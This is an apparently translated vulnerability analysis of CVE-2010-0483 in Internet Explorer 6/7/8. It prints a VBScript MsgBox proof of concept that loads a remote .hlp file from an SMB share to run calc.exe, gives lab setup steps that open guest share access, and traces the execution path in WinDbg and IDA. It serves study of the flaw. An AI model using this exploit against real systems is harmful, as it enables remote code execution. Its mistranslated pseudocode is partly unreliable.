cve-2010-0483 analysis of Microsoft Internet Explorer 6/7/8-' WinHlp32.exe ' MsgBox () ' Remote Code execution

Related information: https://www.exploit-db.com/exploits/11615/

The goal is to understand the process of vulnerability execution.

Prepare the service-side environment according to the data:

Using a win7 as a server, you need to share a folder on Win7 for client access. The folder that my test environment shares is www.

(1) Enable guest Guest account, add guest Read permission when sharing folder. You should be able to access it at this time on Win7, but the XP virtual machine on the LAN cannot access the \\192.168.0.11\www\

(2) Run Secpol.msc open Local Security policy, local policy, user rights assignment, deny access to this computer from the network, remove guest at this point, the XP virtual machine can access the shared file

(3) Place at www directorytest.hlp文件和html文件提供给客户端访问

The contents of the HTML file are roughly

<HTML><Body><Scripttype= "Text/vbscript">Big= "\\192.168.0.11\www\test.hlp"  //For I=1 to 2500//big = big & "\. \"//NextMsgBox"Press F1 to save the world", ,"Please save the world", Big,1MsgBox"Press F1 to close this annoying popup", ,"", Big,1MsgBox"Press F1 to close this annoying popup", ,"", Big,1</Script></Body></HTML>

Search for VBScript MsgBox Related Materials

MsgBox (Prompt[,buttons][,title][,helpfile,context])

The parameter helpfile can specify a Help file that provides context-sensitive Help for the dialog box, so that the remote specified HLP file is accessed when F1 is pressed

First glance at the contents of the HLP file, and found that the call to Calc.exe

2. Client Testing

Open IE, and use the WinDbg attach process, then access the HTML page and when the popup MsgBox, press F1 out the following situation:

Depending on the phenomenon, it appears that a new process has been created, either through the log view of the Processhacker tool, or by observing the Task manager directly, and further confirming the vulnerability process to CreateProcess.

BP kernel32! Createprocessw

Press F1, break down to view function parameters, execute "C:\WINDOWS\winhlp32-x", create WinHlp32.exe. But no information about "\\192.168.0.11\www\test.hlp" was found.

View the function call stack again

Observe the important functions of Winhelpa, Findwinhelpwindow and Launchhelp.

Based on IDA Analysis BOOL __stdcall Winhelpa (HWND hwndmain, LPCSTR lpszhelp, UINT Ucommand, Ulong_ptr dwdata)

Give the Winhelpa a break first.

BP user32! After the Winhelpa is run, press F1 again to confirm that the LPSZHELP variable points to "\\192.168.0.11\www\test.hlp" according to the parameters on the stack.

Ida in F5 disassembly user32! The WINHELPA function tracks the LPSZHELP variable and discovers that only the Hfill function operates on the variable. Follow up Hfill function analysis.

The Hfill function allocates memory and copies the lpszhelp to the offset 0x10 of the memory.

__stdcall Hfill (LPCSTR lpszhelp, USHORT Ucommand, Ulong_ptr dwdata) {if(Lpszhelp! =0)    {        intLen = strlen (lpszhelp) +1;//ebx        intS1 =0;//esi;        if(Dwdata! =NULL) {loc_77d4762e BYTE tmp= (arg_4>>8&)0xFF; if(TMP! =1)            {                if(TMP = =2) S1 = *Arg_8; }Else{loc_77d47643} lpbyte p= LocalAlloc (0x40, S1 + len +0x10);//Allocating memoryif(P! =NULL) {                * (WORD *) (p+2) =Ucommand; * (WORD *) p =0; * (DWORD *) (p+8) =0; if(Lpszhelp! =NULL) {                    * (WORD *) (p+0xC) =0x10; strcpy (P+0x10), lpszhelp);//Copy the Lpszhelp to the allocated memory offset at 0x10}Else{                    * (WORD *) (p+0xC) =0; }                if(tmp!=1&& S1! =0) {loc_77d47682}Else if(TMP = =2&& S1! =0) {loc_77d4765e}Else{                    * (DWORD *) (p+4) =Dwdata; } loc_77d3ee2f* (WORD *) (p+0xE) =DX; returnP//The assigned address is returned}Else{loc_77d47657}}}Else{LOC_77D3EE3A}}

In the remaining flow of the Winhelpa function, Findwinhelpwindow knows from the call stack above that the function created the WINHLP32 process and returns a handle to the window.

Sendwinhelpmessage sends a message with a message code of 0x38 and the memory allocated by the Hfill function as lparam.

In order to debug a newly created process, execute the. childdbg 1 command to debug the sub-process, after the run-off

The new process is broken according to the 1 representation in the lower left corner.

Because SendMessage is not sending a queue message, find the window's message callback function. The generic message callback function invokes the default handler function DefWindowProc

Ida parses WinHlp32.exe and locates the default message callback function in the import table defwindowproc,ctrl+x a cross-reference to find the referenced location. Helpwndproc to the comparison of possible message callback functions

After arriving at Helpwndproc, continue to F5 the disassembly to this piece of code

The confirmation message code is indeed 0x38. Down-breaking BP winhlp32! Helpwndproc ". if (POI (esp+8)! = 0x38) {g}", follow up after a break dispatcherproc

With the PCT command to the actual executed function, skip the unimportant function, and locate the call _generatemessage (0x407u, 0, (LPARAM) v24); The function sends the message code 0x407, and the parameter v24 contains the HLP path

Re-view Helpwndproc's handling of 0x407 and navigate to

Because the HLP file creates a calculator process, then createprocessw down, locates the process, and then views the function call stack

Shellexecutea This function is to run an external program. The guess should be to turn on the calculator and re-disconnect the debug to confirm

After the WINHLP32 process is created, the BP shell32! Shellexecutea

That means that the contents of the HLP file have been executed at this time, and then locate winhlp32! Execute down View parameters

According to Ida's analysis; The int __stdcall Execute (LPCSTR lpString2) found parameters lpString2 the contents of the HLP file "EF (" C:\\windows\\calc.exe "," ', 1) ".

Reposition the upper function Configmacroshde use IDA for disassembly

It can be seen that the function of Configmacroshde is to iterate through the contents of HLP and be executed by the Execute function.

Continue to position the upper function Freplaceclonehde, re-debug, create WinHlp32.exe to process, Freplaceclonehde down
BP winhlp32! Freplaceclonehde

F5 to the upper function Execapi disassembly can know Freplaceclonehde parameter 1 is a string pointer, parameter 2 is a pointer to the Help file path string pointer

F5 Freplaceclonehde Disassembly, Configmacroshde data from v38, v38 from Hcreate, V5 is parameter 2 pphelp pointer to hlp file

The process of opening the file is hdecreate->sub_1019c49->hfsopenfm->fplungeqfshr->fidopenfm->kernel32!_lopen

Finally, remove the share, disable the guest, and restore the previous preparation work.

cve-2010-0483 analysis of Microsoft Internet Explorer 6/7/8-' WinHlp32.exe ' MsgBox () ' Remote Code execution